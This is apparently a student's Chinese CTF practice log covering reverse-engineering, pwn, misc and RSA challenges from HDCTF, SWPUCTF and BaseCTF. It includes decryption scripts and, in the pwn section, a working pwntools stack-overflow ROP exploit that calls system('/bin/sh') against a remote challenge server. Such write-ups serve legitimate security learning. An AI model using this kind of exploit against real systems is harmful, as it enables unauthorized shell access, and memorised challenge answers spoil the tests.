1.26学习记录

re

[HDCTF 2023]easy_re

拿到附件先查壳发现有upx壳，用kali脱一下壳之后用ida找到主调函数，反汇编函数是比较加密后的字符s与a，所以需要找到加密方式找到密文找到加密方式是base64而且没有换表赛博厨子炒一下

[SWPUCTF 2021 新生赛]简简单单的逻辑

题目是一个py文件观察加密方式：对列表list中的每个元素list[i]进行位运算，先将其右移 4 位，再将其与 15（十六进制的 0xf）进行按位与运算并左移 4 位，然后将两个结果相加，得到一个新的数值key。将flag字符串中第i个字符的 ASCII 码值与key进行异或运算，将结果转换为十六进制字符串，去掉前缀0x，并使用zfill(2)方法确保字符串长度为 2，然后将其追加到result字符串中。
解密就将这段代码逆过来

# 已知加密后的结果
result = 'bcfba4d0038d48bd4b00f82796d393dfec'

# 将十六进制字符串转换为字节数组
encrypted_bytes = bytes.fromhex(result)

# 密钥列表
list = [47, 138, 127, 57, 117, 188, 51, 143, 17, 84, 42, 135, 76, 105, 28, 169, 25]

# 初始化一个空字符串用于存储解密后的 flag
flag = ''

# 遍历每个字节和对应的密钥
for i in range(len(encrypted_bytes)):
    key = (list[i] >> 4) + ((list[i] & 0xf) << 4)
    # 对每个字节进行异或操作以还原原始字符
    decrypted_char = chr(encrypted_bytes[i] ^ key)
    flag += decrypted_char

print(flag)

pwn

basectf2024 我把她丢了

根据题意这是一个栈溢出这是一个elf文件，用ida查看，找到主调函数发现了read函数处读取超过存贮数，存在栈溢出找到了bin/sh函数，这是入手点
exp:

from pwn import *
io=process('./pwn')
io=remote("gz.imxbt.cn",20389)
elf=ELF('./pwn')
pop_rdi=0x401196
binsh=0x402008
ret=0x40101a
shell=elf.plt['system']
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)
io.recv()
io.sendline(payload)
io.interactive()

misc

basectf2024 海上遇到了鲨鱼

这题给了一个pncpng文件，是流量包文件，先分析追踪流
在tcp流中没找到flag
再查看http追踪流发现flag了，镜像一下即可

s="}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB"#输入需要镜像的字符
reseved_s=s[::-1]
print(reseved_s)

crypto

basectf2024 babyrsa

比较基础的rsa吧，题目如下：

from Crypto.Util.number import *

flag=b'BaseCTF{}'
m=bytes_to_long(flag)

n=getPrime(1024)
e=65537
c=pow(m,e,n)

print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832

exp：

from Crypto.Util.number import *
import gmpy2
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832

phin = n-1
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))